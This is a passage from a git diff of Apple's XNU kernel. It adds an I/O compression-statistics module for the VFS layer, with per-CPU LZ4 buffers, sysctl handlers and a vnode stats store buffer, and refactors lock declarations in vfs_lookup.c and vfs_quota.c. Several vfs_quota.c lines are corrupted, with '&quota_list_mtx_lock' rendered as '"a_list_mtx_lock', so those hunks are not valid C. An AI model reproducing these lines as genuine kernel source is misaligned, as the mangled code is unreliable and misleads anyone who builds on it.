kheap_alloc(KHEAP_DEFAULT, sizeof(lz4_encode_scratch_t *) * io_compression_stats_cpu_count, Z_ZERO); + if (per_cpu_scratch_buf == NULL) { + err = ENOMEM; + goto out; + } + assert(per_cpu_compression_buf == NULL); + per_cpu_compression_buf = kheap_alloc(KHEAP_DEFAULT, sizeof(uint8_t *) * io_compression_stats_cpu_count, Z_ZERO); + if (per_cpu_compression_buf == NULL) { + err = ENOMEM; + goto out; + } + } + for (uint32_t cpu = 0; cpu < io_compression_stats_cpu_count; cpu++) { + if (alloc_type == IO_COMPRESSION_STATS_NEW_ALLOC) { + per_cpu_scratch_buf[cpu] = kheap_alloc(KHEAP_DEFAULT, sizeof(lz4_encode_scratch_t), Z_ZERO); + if (per_cpu_scratch_buf[cpu] == NULL) { + err = ENOMEM; + goto out; + } + } else { + kheap_free_addr(KHEAP_DEFAULT, per_cpu_compression_buf[cpu]); + } + per_cpu_compression_buf[cpu] = kheap_alloc(KHEAP_DEFAULT, block_size, Z_ZERO); + if (per_cpu_compression_buf[cpu] == NULL) { + err = ENOMEM; + goto out; + } + } + bzero(&iocs_store_buffer, sizeof(struct iocs_store_buffer)); + iocs_store_buffer.buffer = kheap_alloc(KHEAP_DEFAULT, IOCS_STORE_BUFFER_SIZE, Z_ZERO); + if (iocs_store_buffer.buffer == NULL) { + err = ENOMEM; + goto out; + } + iocs_store_buffer.current_position = 0; + iocs_store_buffer.marked_point = 0; + + assert(vnpath_scratch_buf == NULL); + vnpath_scratch_buf = kheap_alloc(KHEAP_DEFAULT, MAXPATHLEN, Z_ZERO); + if (vnpath_scratch_buf == NULL) { + err = ENOMEM; + goto out; + } + +out: + if (err) { + /* In case of any error, irrespective of whether it is new alloc or resize, + * dellocate all buffers and fail */ + io_compression_stats_deallocate_compression_buffers(); + } + return err; +} + +static void +io_compression_stats_deallocate_compression_buffers() +{ + uint32_t cpu; + if (per_cpu_compression_buf != NULL) { + for (cpu = 0; cpu < io_compression_stats_cpu_count; cpu++) { + if (per_cpu_compression_buf[cpu] != NULL) { + kheap_free_addr(KHEAP_DEFAULT, per_cpu_compression_buf[cpu]); + per_cpu_compression_buf[cpu] = NULL; + } + } + kheap_free_addr(KHEAP_DEFAULT, per_cpu_compression_buf); + per_cpu_compression_buf = NULL; + } + + if (per_cpu_scratch_buf != NULL) { + for (cpu = 0; cpu < io_compression_stats_cpu_count; cpu++) { + if (per_cpu_scratch_buf[cpu] != NULL) { + kheap_free_addr(KHEAP_DEFAULT, per_cpu_scratch_buf[cpu]); + per_cpu_scratch_buf[cpu] = NULL; + } + } + kheap_free_addr(KHEAP_DEFAULT, per_cpu_scratch_buf); + per_cpu_scratch_buf = NULL; + } + + if (iocs_store_buffer.buffer != NULL) { + kheap_free_addr(KHEAP_DEFAULT, iocs_store_buffer.buffer); + bzero(&iocs_store_buffer, sizeof(struct iocs_store_buffer)); + } + + iocs_sb_bytes_since_last_mark = 0; + iocs_sb_bytes_since_last_notification = 0; + + if (vnpath_scratch_buf != NULL) { + kheap_free_addr(KHEAP_DEFAULT, vnpath_scratch_buf); + vnpath_scratch_buf = NULL; + } +} + + +static int +sysctl_io_compression_stats_enable SYSCTL_HANDLER_ARGS +{ +#pragma unused (arg1, arg2, oidp) + + int error = 0; + int enable = 0; + + error = SYSCTL_OUT(req, &io_compression_stats_enable, sizeof(int)); + + if (error || !req->newptr) { + return error; + } + + error = SYSCTL_IN(req, &enable, sizeof(int)); + if (error) { + return error; + } + + if (!((enable == 1) || (enable == 0))) { + return EINVAL; + } + + lck_rw_lock_exclusive(&io_compression_stats_lock); + lck_mtx_lock(&iocs_store_buffer_lock); + if ((io_compression_stats_enable == 0) && (enable == 1)) { + /* Enabling collection of stats. Allocate appropriate buffers */ + error = io_compression_stats_allocate_compression_buffers(IO_COMPRESSION_STATS_NEW_ALLOC, io_compression_stats_block_size); + if (error == 0) { + io_compression_stats_enable = enable; + io_compression_stats_dbg("SUCCESS: setting io_compression_stats_enable to %d", io_compression_stats_enable); + } else { + io_compression_stats_dbg("FAILED: setting io_compression_stats_enable to %d", io_compression_stats_enable); + } + } else if ((io_compression_stats_enable == 1) && (enable == 0)) { + io_compression_stats_deallocate_compression_buffers(); + io_compression_stats_enable = 0; + io_compression_stats_dbg("SUCCESS: setting io_compression_stats_enable to %d", io_compression_stats_enable); + } + lck_mtx_unlock(&iocs_store_buffer_lock); + lck_rw_unlock_exclusive(&io_compression_stats_lock); + + return error; +} +SYSCTL_PROC(_vfs, OID_AUTO, io_compression_stats_enable, CTLTYPE_INT | CTLFLAG_RW, 0, 0, &sysctl_io_compression_stats_enable, "I", ""); + +static int +sysctl_io_compression_block_size SYSCTL_HANDLER_ARGS +{ +#pragma unused (arg1, arg2, oidp) + + int error = 0; + int block_size = io_compression_stats_block_size; + + error = SYSCTL_OUT(req, &block_size, sizeof(int)); + + if (error || !req->newptr) { + return error; + } + + error = SYSCTL_IN(req, &block_size, sizeof(int)); + if (error) { + return error; + } + + if (block_size < IO_COMPRESSION_STATS_MIN_BLOCK_SIZE || block_size > IO_COMPRESSION_STATS_MAX_BLOCK_SIZE) { + return EINVAL; + } + + lck_rw_lock_exclusive(&io_compression_stats_lock); + + if (io_compression_stats_block_size != block_size) { + if (io_compression_stats_enable == 1) { + /* IO compression stats is enabled, rellocate buffers. */ + error = io_compression_stats_allocate_compression_buffers(IO_COMPRESSION_STATS_RESIZE, block_size); + if (error == 0) { + io_compression_stats_block_size = block_size; + io_compression_stats_dbg("SUCCESS: setting io_compression_stats_block_size to %d", io_compression_stats_block_size); + } else { + /* Failed to allocate buffers, disable IO compression stats */ + io_compression_stats_enable = 0; + io_compression_stats_dbg("Failed: setting io_compression_stats_block_size to %d", io_compression_stats_block_size); + } + } else { + /* IO compression stats is disabled, only set the io_compression_stats_block_size */ + io_compression_stats_block_size = block_size; + io_compression_stats_dbg("SUCCESS: setting io_compression_stats_block_size to %d", io_compression_stats_block_size); + } + } + lck_rw_unlock_exclusive(&io_compression_stats_lock); + + + return error; +} +SYSCTL_PROC(_vfs, OID_AUTO, io_compression_stats_block_size, CTLTYPE_INT | CTLFLAG_RW, 0, 0, &sysctl_io_compression_block_size, "I", ""); + + +static int32_t +iocs_compress_block(uint8_t *block_ptr, uint32_t block_size) +{ + disable_preemption(); + + uint32_t current_cpu = cpu_number(); + if (!(current_cpu < io_compression_stats_cpu_count)) { + enable_preemption(); + return -1; + } + + lz4_encode_scratch_t *scratch_buf = per_cpu_scratch_buf[current_cpu]; + uint8_t *dest_buf = per_cpu_compression_buf[current_cpu]; + + int compressed_block_size = (int) lz4raw_encode_buffer(dest_buf, block_size, + block_ptr, block_size, (lz4_hash_entry_t *) scratch_buf); + + enable_preemption(); + + return compressed_block_size; +} +/* + * Compress buf in chunks of io_compression_stats_block_size + */ +static uint32_t +iocs_compress_buffer(vnode_t vn, uint8_t *buf_ptr, uint32_t buf_size) +{ + uint32_t offset; + uint32_t compressed_size = 0; + int block_size = io_compression_stats_block_size; + int block_stats_scaling_factor = block_size / IOCS_BLOCK_NUM_SIZE_BUCKETS; + + for (offset = 0; offset < buf_size; offset += block_size) { + int current_block_size = min(block_size, buf_size - offset); + int current_compressed_block_size = iocs_compress_block(buf_ptr + offset, current_block_size); + + if (current_compressed_block_size == 0) { + compressed_size += current_block_size; + vnode_updateiocompressionblockstats(vn, current_block_size / block_stats_scaling_factor); + } else if (current_compressed_block_size != -1) { + compressed_size += current_compressed_block_size; + vnode_updateiocompressionblockstats(vn, current_compressed_block_size / block_stats_scaling_factor); + } + } + + return compressed_size; +} + +static uint32_t +log2down(uint32_t x) +{ + return 31 - __builtin_clz(x); +} + +/* + * Once we get the IO compression stats for the entire buffer, we update buffer_size_compressibility_dist, + * which helps us observe distribution across various io sizes and compression factors. + * The goal of next two functions is to get the index in this buffer_size_compressibility_dist table. + */ + +/* + * Maps IO size to a bucket between 0 - IO_COMPRESSION_STATS_MAX_SIZE_BUCKET + * for size < 4096 returns 0 and size > 1MB returns IO_COMPRESSION_STATS_MAX_SIZE_BUCKET (9). + * For IO sizes in-between we arrive at the index based on log2 function. + * sizes 4097 - 8192 => index = 1, + * sizes 8193 - 16384 => index = 2, and so on + */ +#define SIZE_COMPRESSION_DIST_SIZE_BUCKET_MIN 4096 +#define SIZE_COMPRESSION_DIST_SIZE_BUCKET_MAX (1024 * 1024) +static uint32_t +get_buffer_size_bucket(uint32_t size) +{ + if (size <= SIZE_COMPRESSION_DIST_SIZE_BUCKET_MIN) { + return 0; + } + if (size > SIZE_COMPRESSION_DIST_SIZE_BUCKET_MAX) { + return IOCS_BUFFER_MAX_BUCKET; + } +#define IOCS_INDEX_MAP_OFFSET 11 + return log2down(size - 1) - IOCS_INDEX_MAP_OFFSET; +} + +/* + * Maps compression factor to a bucket between 0 - IO_COMPRESSION_STATS_MAX_COMPRESSION_BUCKET + */ +static uint32_t +get_buffer_compressibility_bucket(uint32_t uncompressed_size, uint32_t compressed_size) +{ + int saved_space_pc = (uncompressed_size - compressed_size) * 100 / uncompressed_size; + + if (saved_space_pc < 0) { + saved_space_pc = 0; + } + + /* saved_space_pc lies bw 0 - 100. log2(saved_space_pc) lies bw 0 - 6 */ + return log2down(saved_space_pc); +} + +void +io_compression_stats(buf_t bp) +{ + uint8_t *buf_ptr = NULL; + int bflags = bp->b_flags; + uint32_t compressed_size = 0; + uint32_t buf_cnt = buf_count(bp); + uint64_t duration = 0; + caddr_t vaddr = NULL; + vnode_t vn = buf_vnode(bp); + int err = 0; + + if ((io_compression_stats_enable != 1) || (bflags & B_READ) || (buf_cnt <= 0)) { + return; + } + + if (!lck_rw_try_lock_shared(&io_compression_stats_lock)) { + /* sysctl modifying IO compression stats parameters is in progress. + * Don't block, since malloc might be in progress. */ + return; + } + /* re-check io_compression_stats_enable with lock */ + if (io_compression_stats_enable != 1) { + goto out; + } + + err = buf_map(bp, &vaddr); + if (!err) { + buf_ptr = (uint8_t *) vaddr; + } + + if (buf_ptr != NULL) { + int64_t start = mach_absolute_time(); + compressed_size = iocs_compress_buffer(vn, buf_ptr, buf_cnt); + absolutetime_to_nanoseconds(mach_absolute_time() - start, &duration); + + if (compressed_size != 0) { + vnode_updateiocompressionbufferstats(vn, buf_cnt, compressed_size, + get_buffer_size_bucket(buf_cnt), + get_buffer_compressibility_bucket(buf_cnt, compressed_size)); + } + } + + KDBG_RELEASE(FSDBG_CODE(DBG_VFS, DBG_VFS_IO_COMPRESSION_STATS) | DBG_FUNC_NONE, + duration, io_compression_stats_block_size, compressed_size, buf_cnt, 0); + +out: + lck_rw_unlock_shared(&io_compression_stats_lock); + if (buf_ptr != NULL) { + buf_unmap(bp); + } +} + +static void +iocs_notify_user(void) +{ + mach_port_t user_port = MACH_PORT_NULL; + kern_return_t kr = host_get_iocompressionstats_port(host_priv_self(), &user_port); + if ((kr != KERN_SUCCESS) || !IPC_PORT_VALID(user_port)) { + return; + } + iocompressionstats_notification(user_port, 0); + ipc_port_release_send(user_port); +} +static void +construct_iocs_sbe_from_vnode(struct vnode *vp, struct iocs_store_buffer_entry *iocs_sbe) +{ + int path_len = MAXPATHLEN; + + vn_getpath(vp, vnpath_scratch_buf, &path_len); + /* + * Total path length is path_len, we can copy out IOCS_SBE_PATH_LEN bytes. We are interested + * in first segment of the path to try and figure out the process writing to the file, and we are + * interested in the last segment to figure out extention. So, in cases where + * IOCS_SBE_PATH_LEN < path_len, lets copy out first IOCS_PATH_START_BYTES_TO_COPY bytes and + * last IOCS_PATH_END_BYTES_TO_COPY (last segment includes the null character). + */ + if (path_len > IOCS_SBE_PATH_LEN) { + strncpy(iocs_sbe->path_name, vnpath_scratch_buf, IOCS_PATH_START_BYTES_TO_COPY); + strncpy(iocs_sbe->path_name + IOCS_PATH_START_BYTES_TO_COPY, + vnpath_scratch_buf + path_len - IOCS_PATH_END_BYTES_TO_COPY, + IOCS_PATH_END_BYTES_TO_COPY); + } else { + strncpy(iocs_sbe->path_name, vnpath_scratch_buf, IOCS_SBE_PATH_LEN); + } + memcpy(&iocs_sbe->iocs, vp->io_compression_stats, sizeof(struct io_compression_stats)); +} +void +vnode_iocs_record_and_free(struct vnode *vp) +{ + int notify = 0; + struct iocs_store_buffer_entry *iocs_sbe = NULL; + + if (!lck_mtx_try_lock(&iocs_store_buffer_lock)) { + goto out; + } + + if (iocs_store_buffer.buffer == NULL) { + goto release; + } + + assert(iocs_store_buffer.current_position + sizeof(struct iocs_store_buffer_entry) <= IOCS_STORE_BUFFER_SIZE); + + iocs_sbe = (struct iocs_store_buffer_entry *)(iocs_store_buffer.buffer + iocs_store_buffer.current_position); + + construct_iocs_sbe_from_vnode(vp, iocs_sbe); + + iocs_store_buffer.current_position += sizeof(struct iocs_store_buffer_entry); + + if (iocs_store_buffer.current_position + sizeof(struct iocs_store_buffer_entry) > IOCS_STORE_BUFFER_SIZE) { + /* We've reached end of the buffer, move back to the top */ + iocs_store_buffer.current_position = 0; + } + + iocs_sb_bytes_since_last_mark += sizeof(struct iocs_store_buffer_entry); + iocs_sb_bytes_since_last_notification += sizeof(struct iocs_store_buffer_entry); + + if ((iocs_sb_bytes_since_last_mark > IOCS_STORE_BUFFER_NOTIFY_AT) && + (iocs_sb_bytes_since_last_notification > IOCS_STORE_BUFFER_NOTIFICATION_INTERVAL)) { + notify = 1; + iocs_sb_bytes_since_last_notification = 0; + } + +release: + lck_mtx_unlock(&iocs_store_buffer_lock); +out: + /* We need to free io_compression_stats whether or not we were able to record it */ + bzero(vp->io_compression_stats, sizeof(struct io_compression_stats)); + zfree(io_compression_stats_zone, vp->io_compression_stats); + vp->io_compression_stats = NULL; + if (notify) { + iocs_notify_user(); + } +} + +struct vnode_iocs_context { + struct sysctl_req *addr; + int current_ptr; +}; + +static int +vnode_iocs_callback(struct vnode *vp, void *vctx) +{ + struct vnode_iocs_context *ctx = vctx; + struct sysctl_req *req = ctx->addr; + int current_ptr = ctx->current_ptr; + + if (current_ptr + sizeof(struct iocs_store_buffer_entry) < req->oldlen) { + if (vp->io_compression_stats != NULL) { + construct_iocs_sbe_from_vnode(vp, (struct iocs_store_buffer_entry *) (req->oldptr + current_ptr)); + current_ptr += sizeof(struct iocs_store_buffer_entry); + } + } else { + return VNODE_RETURNED_DONE; + } + ctx->current_ptr = current_ptr; + + return VNODE_RETURNED; +} + +static int +vfs_iocs_callback(mount_t mp, void *arg) +{ + if (mp->mnt_flag & MNT_LOCAL) { + vnode_iterate(mp, VNODE_ITERATE_ALL, vnode_iocs_callback, arg); + } + + return VFS_RETURNED; +} + +extern long numvnodes; + +static int +sysctl_io_compression_dump_stats SYSCTL_HANDLER_ARGS +{ +#pragma unused (arg1, arg2, oidp) + + int32_t error = 0; + uint32_t inp_flag = 0; + uint32_t ret_len; + + if (io_compression_stats_enable == 0) { + error = EINVAL; + goto out; + } + + if ((req->newptr != USER_ADDR_NULL) && (req->newlen == sizeof(uint32_t))) { + error = SYSCTL_IN(req, &inp_flag, sizeof(uint32_t)); + if (error) { + goto out; + } + switch (inp_flag) { + case IOCS_SYSCTL_LIVE: + case IOCS_SYSCTL_STORE_BUFFER_RD_ONLY: + case IOCS_SYSCTL_STORE_BUFFER_MARK: + break; + default: + error = EINVAL; + goto out; + } + } else { + error = EINVAL; + goto out; + } + + if (req->oldptr == USER_ADDR_NULL) { + /* Query to figure out size of the buffer */ + if (inp_flag & IOCS_SYSCTL_LIVE) { + req->oldidx = numvnodes * sizeof(struct iocs_store_buffer_entry); + } else { + /* Buffer size for archived case, let's keep it + * simple and return IOCS store buffer size */ + req->oldidx = IOCS_STORE_BUFFER_SIZE; + } + goto out; + } + + if (inp_flag & IOCS_SYSCTL_LIVE) { + struct vnode_iocs_context ctx; + + bzero(&ctx, sizeof(struct vnode_iocs_context)); + ctx.addr = req; + vfs_iterate(0, vfs_iocs_callback, &ctx); + req->oldidx = ctx.current_ptr; + goto out; + } + + /* reading from store buffer */ + lck_mtx_lock(&iocs_store_buffer_lock); + + if (iocs_store_buffer.buffer == NULL) { + error = EINVAL; + goto release; + } + if (iocs_sb_bytes_since_last_mark == 0) { + req->oldidx = 0; + goto release; + } + + int expected_size = 0; + /* Dry run to figure out amount of space required to copy out the + * iocs_store_buffer.buffer */ + if (iocs_store_buffer.marked_point < iocs_store_buffer.current_position) { + expected_size = iocs_store_buffer.current_position - iocs_store_buffer.marked_point; + } else { + expected_size = IOCS_STORE_BUFFER_SIZE - iocs_store_buffer.marked_point; + expected_size += iocs_store_buffer.current_position; + } + + if (req->oldlen < expected_size) { + error = ENOMEM; + req->oldidx = 0; + goto release; + } + + if (iocs_store_buffer.marked_point < iocs_store_buffer.current_position) { + error = copyout(iocs_store_buffer.buffer + iocs_store_buffer.marked_point, + req->oldptr, + iocs_store_buffer.current_position - iocs_store_buffer.marked_point); + if (error) { + req->oldidx = 0; + goto release; + } + ret_len = iocs_store_buffer.current_position - iocs_store_buffer.marked_point; + } else { + error = copyout(iocs_store_buffer.buffer + iocs_store_buffer.marked_point, + req->oldptr, + IOCS_STORE_BUFFER_SIZE - iocs_store_buffer.marked_point); + if (error) { + req->oldidx = 0; + goto release; + } + ret_len = IOCS_STORE_BUFFER_SIZE - iocs_store_buffer.marked_point; + + error = copyout(iocs_store_buffer.buffer, + req->oldptr + ret_len, + iocs_store_buffer.current_position); + if (error) { + req->oldidx = 0; + goto release; + } + ret_len += iocs_store_buffer.current_position; + } + + req->oldidx = ret_len; + if ((ret_len != 0) && (inp_flag & IOCS_SYSCTL_STORE_BUFFER_MARK)) { + iocs_sb_bytes_since_last_mark = 0; + iocs_store_buffer.marked_point = iocs_store_buffer.current_position; + } +release: + lck_mtx_unlock(&iocs_store_buffer_lock); + +out: + return error; +} +SYSCTL_PROC(_vfs, OID_AUTO, io_compression_dump_stats, CTLFLAG_WR | CTLTYPE_NODE, 0, 0, sysctl_io_compression_dump_stats, "-", ""); + +errno_t +vnode_updateiocompressionblockstats(vnode_t vp, uint32_t size_bucket) +{ + if (vp == NULL) { + return EINVAL; + } + + if (size_bucket >= IOCS_BLOCK_NUM_SIZE_BUCKETS) { + return EINVAL; + } + + if (vp->io_compression_stats == NULL) { + io_compression_stats_t iocs = (io_compression_stats_t)zalloc_flags(io_compression_stats_zone, Z_ZERO); + if (iocs == NULL) { + return ENOMEM; + } + vnode_lock_spin(vp); + /* Re-check with lock */ + if (vp->io_compression_stats == NULL) { + vp->io_compression_stats = iocs; + } else { + zfree(io_compression_stats_zone, iocs); + } + vnode_unlock(vp); + } + OSIncrementAtomic((SInt32 *)&vp->io_compression_stats->block_compressed_size_dist[size_bucket]); + + return 0; +} +errno_t +vnode_updateiocompressionbufferstats(__unused vnode_t vp, __unused uint64_t uncompressed_size, __unused uint64_t compressed_size, __unused uint32_t size_bucket, __unused uint32_t compression_bucket) +{ + if (vp == NULL) { + return EINVAL; + } + + /* vnode_updateiocompressionblockstats will always be called before vnode_updateiocompressionbufferstats. + * Hence vp->io_compression_stats should already be allocated */ + if (vp->io_compression_stats == NULL) { + return EINVAL; + } + + if ((size_bucket >= IOCS_BUFFER_NUM_SIZE_BUCKETS) || (compression_bucket >= IOCS_BUFFER_NUM_COMPRESSION_BUCKETS)) { + return EINVAL; + } + + OSAddAtomic64(uncompressed_size, &vp->io_compression_stats->uncompressed_size); + OSAddAtomic64(compressed_size, &vp->io_compression_stats->compressed_size); + + OSIncrementAtomic((SInt32 *)&vp->io_compression_stats->buffer_size_compression_dist[size_bucket][compression_bucket]); + + return 0; +} diff --git a/bsd/vfs/vfs_io_compression_stats.h b/bsd/vfs/vfs_io_compression_stats.h new file mode 100644 index 000000000..decec8df7 --- /dev/null +++ b/bsd/vfs/vfs_io_compression_stats.h @@ -0,0 +1,65 @@ +/* + * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +#ifndef _MISCFS_SPECFS_IO_COMPRESSION_STATS_H_ +#define _MISCFS_SPECFS_IO_COMPRESSION_STATS_H_ + +#include +#include + +void io_compression_stats_init(void); +void io_compression_stats(buf_t bp); + +#define IO_COMPRESSION_STATS_DEFAULT_BLOCK_SIZE (4 * 1024) +#define IO_COMPRESSION_STATS_MIN_BLOCK_SIZE (4 * 1024) +#define IO_COMPRESSION_STATS_MAX_BLOCK_SIZE (1024 * 1024 * 1024) + +#if IO_COMPRESSION_STATS_DEBUG +#define io_compression_stats_dbg(fmt, ...) \ + printf("%s: " fmt "\n", __func__, ## __VA_ARGS__) +#else +#define io_compression_stats_dbg(fmt, ...) +#endif + +/* iocs_store_buffer: Buffer that captures the stats of vnode being reclaimed */ +struct iocs_store_buffer { + void* buffer; + uint32_t current_position; + uint32_t marked_point; +}; + +#define IOCS_STORE_BUFFER_NUM_SLOTS 10000 +#define IOCS_STORE_BUFFER_SIZE (IOCS_STORE_BUFFER_NUM_SLOTS * (sizeof(struct iocs_store_buffer_entry))) + +/* Notify user when the buffer is 80% full */ +#define IOCS_STORE_BUFFER_NOTIFY_AT ((IOCS_STORE_BUFFER_SIZE * 8) / 10) + +/* Wait for the buffer to be 10% more full before notifying again */ +#define IOCS_STORE_BUFFER_NOTIFICATION_INTERVAL (IOCS_STORE_BUFFER_SIZE / 10) + +#endif diff --git a/bsd/vfs/vfs_lookup.c b/bsd/vfs/vfs_lookup.c index 6a1700105..efe27e3e0 100644 --- a/bsd/vfs/vfs_lookup.c +++ b/bsd/vfs/vfs_lookup.c @@ -125,7 +125,7 @@ static int lookup_handle_emptyname(struct nameidata *ndp, struct co static int lookup_handle_rsrc_fork(vnode_t dp, struct nameidata *ndp, struct componentname *cnp, int wantparent, vfs_context_t ctx); #endif -extern lck_rw_t * rootvnode_rw_lock; +extern lck_rw_t rootvnode_rw_lock; /* * Convert a pathname into a pointer to a locked inode. @@ -356,7 +356,7 @@ retry_copy: * determine the starting point for the translation. */ proc_dirs_lock_shared(p); - lck_rw_lock_shared(rootvnode_rw_lock); + lck_rw_lock_shared(&rootvnode_rw_lock); if (!(fdp->fd_flags & FD_CHROOT)) { ndp->ni_rootdir = rootvnode; @@ -371,7 +371,7 @@ retry_copy: /* This should be a panic */ printf("fdp->fd_rdir is not set\n"); } - lck_rw_unlock_shared(rootvnode_rw_lock); + lck_rw_unlock_shared(&rootvnode_rw_lock); proc_dirs_unlock_shared(p); error = ENOENT; goto error_out; @@ -397,7 +397,7 @@ retry_copy: if (dp == NULLVP || (dp->v_lflag & VL_DEAD)) { dp = NULLVP; - lck_rw_unlock_shared(rootvnode_rw_lock); + lck_rw_unlock_shared(&rootvnode_rw_lock); proc_dirs_unlock_shared(p); error = ENOENT; goto error_out; @@ -440,7 +440,7 @@ retry_copy: } /* Now that we have our usecount, release the locks */ - lck_rw_unlock_shared(rootvnode_rw_lock); + lck_rw_unlock_shared(&rootvnode_rw_lock); proc_dirs_unlock_shared(p); ndp->ni_dvp = NULLVP; @@ -477,7 +477,7 @@ retry_copy: startdir_with_usecount = NULLVP; } if (rootdir_with_usecount) { - lck_rw_lock_shared(rootvnode_rw_lock); + lck_rw_lock_shared(&rootvnode_rw_lock); if (rootdir_with_usecount == rootvnode) { old_count = os_atomic_dec_orig(&rootdir_with_usecount->v_usecount, relaxed); if (old_count < 2) { @@ -489,7 +489,7 @@ retry_copy: } rootdir_with_usecount = NULLVP; } - lck_rw_unlock_shared(rootvnode_rw_lock); + lck_rw_unlock_shared(&rootvnode_rw_lock); if (rootdir_with_usecount) { vnode_rele(rootdir_with_usecount); rootdir_with_usecount = NULLVP; @@ -537,7 +537,7 @@ error_out: startdir_with_usecount = NULLVP; } if (rootdir_with_usecount) { - lck_rw_lock_shared(rootvnode_rw_lock); + lck_rw_lock_shared(&rootvnode_rw_lock); if (rootdir_with_usecount == rootvnode) { old_count = os_atomic_dec_orig(&rootdir_with_usecount->v_usecount, relaxed); if (old_count < 2) { @@ -547,9 +547,9 @@ error_out: panic("(4) Unexpected pre-decrement value (%d) of usecount for rootvnode %p", old_count, rootdir_with_usecount); } - lck_rw_unlock_shared(rootvnode_rw_lock); + lck_rw_unlock_shared(&rootvnode_rw_lock); } else { - lck_rw_unlock_shared(rootvnode_rw_lock); + lck_rw_unlock_shared(&rootvnode_rw_lock); vnode_rele(rootdir_with_usecount); } rootdir_with_usecount = NULLVP; diff --git a/bsd/vfs/vfs_quota.c b/bsd/vfs/vfs_quota.c index b58c75e27..6fd297c9d 100644 --- a/bsd/vfs/vfs_quota.c +++ b/bsd/vfs/vfs_quota.c @@ -79,15 +79,11 @@ /* vars for quota file lock */ -lck_grp_t * qf_lck_grp; -lck_grp_attr_t * qf_lck_grp_attr; -lck_attr_t * qf_lck_attr; +static LCK_GRP_DECLARE(qf_lck_grp, "quota file"); /* vars for quota list lock */ -lck_grp_t * quota_list_lck_grp; -lck_grp_attr_t * quota_list_lck_grp_attr; -lck_attr_t * quota_list_lck_attr; -lck_mtx_t * quota_list_mtx_lock; +static LCK_GRP_DECLARE(quota_list_lck_grp, "quuota list"); +static LCK_MTX_DECLARE(quota_list_mtx_lock, "a_list_lck_grp); /* Routines to lock and unlock the quota global data */ static int dq_list_lock(void); @@ -131,41 +127,6 @@ static int qf_ref(struct quotafile *); static void qf_rele(struct quotafile *); -/* - * Initialize locks for the quota system. - */ -void -dqinit(void) -{ - /* - * Allocate quota list lock group attribute and group - */ - quota_list_lck_grp_attr = lck_grp_attr_alloc_init(); - quota_list_lck_grp = lck_grp_alloc_init("quota list", quota_list_lck_grp_attr); - - /* - * Allocate qouta list lock attribute - */ - quota_list_lck_attr = lck_attr_alloc_init(); - - /* - * Allocate quota list lock - */ - quota_list_mtx_lock = lck_mtx_alloc_init(quota_list_lck_grp, quota_list_lck_attr); - - - /* - * allocate quota file lock group attribute and group - */ - qf_lck_grp_attr = lck_grp_attr_alloc_init(); - qf_lck_grp = lck_grp_alloc_init("quota file", qf_lck_grp_attr); - - /* - * Allocate quota file lock attribute - */ - qf_lck_attr = lck_attr_alloc_init(); -} - /* * Report whether dqhashinit has been run. */ @@ -199,7 +160,7 @@ static volatile int dq_list_lock_cnt = 0; static int dq_list_lock(void) { - lck_mtx_lock(quota_list_mtx_lock); + lck_mtx_lock("a_list_mtx_lock); return ++dq_list_lock_cnt; } @@ -218,7 +179,7 @@ dq_list_lock_val(void) void dq_list_unlock(void) { - lck_mtx_unlock(quota_list_mtx_lock); + lck_mtx_unlock("a_list_mtx_lock); } @@ -230,7 +191,7 @@ dq_lock_internal(struct dquot *dq) { while (dq->dq_lflags & DQ_LLOCK) { dq->dq_lflags |= DQ_LWANT; - msleep(&dq->dq_lflags, quota_list_mtx_lock, PVFS, "dq_lock_internal", NULL); + msleep(&dq->dq_lflags, "a_list_mtx_lock, PVFS, "dq_lock_internal", NULL); } dq->dq_lflags |= DQ_LLOCK; } @@ -253,21 +214,21 @@ dq_unlock_internal(struct dquot *dq) void dqlock(struct dquot *dq) { - lck_mtx_lock(quota_list_mtx_lock); + lck_mtx_lock("a_list_mtx_lock); dq_lock_internal(dq); - lck_mtx_unlock(quota_list_mtx_lock); + lck_mtx_unlock("a_list_mtx_lock); } void dqunlock(struct dquot *dq) { - lck_mtx_lock(quota_list_mtx_lock); + lck_mtx_lock("a_list_mtx_lock); dq_unlock_internal(dq); - lck_mtx_unlock(quota_list_mtx_lock); + lck_mtx_unlock("a_list_mtx_lock); } @@ -288,7 +249,7 @@ qf_get(struct quotafile *qfp, int type) } if ((qfp->qf_qflags & QTF_CLOSING)) { qfp->qf_qflags |= QTF_WANTED; - msleep(&qfp->qf_qflags, quota_list_mtx_lock, PVFS, "qf_get", NULL); + msleep(&qfp->qf_qflags, "a_list_mtx_lock, PVFS, "qf_get", NULL); } } if (qfp->qf_vp != NULLVP) { @@ -308,7 +269,7 @@ qf_get(struct quotafile *qfp, int type) while ((qfp->qf_qflags & QTF_OPENING) || qfp->qf_refcnt) { qfp->qf_qflags |= QTF_WANTED; - msleep(&qfp->qf_qflags, quota_list_mtx_lock, PVFS, "qf_get", NULL); + msleep(&qfp->qf_qflags, "a_list_mtx_lock, PVFS, "qf_get", NULL); } if (qfp->qf_vp == NULLVP) { qfp->qf_qflags &= ~QTF_CLOSING; @@ -405,7 +366,7 @@ dqfileinit(struct quotafile *qfp) qfp->qf_vp = NULLVP; qfp->qf_qflags = 0; - lck_mtx_init(&qfp->qf_lock, qf_lck_grp, qf_lck_attr); + lck_mtx_init(&qfp->qf_lock, &qf_lck_grp, LCK_ATTR_NULL); } diff --git a/bsd/vfs/vfs_subr.c b/bsd/vfs/vfs_subr.c index 4ae72ee3d..cadd662a6 100644 --- a/bsd/vfs/vfs_subr.c +++ b/bsd/vfs/vfs_subr.c @@ -147,15 +147,15 @@ #include #include -extern lck_grp_t *vnode_lck_grp; -extern lck_attr_t 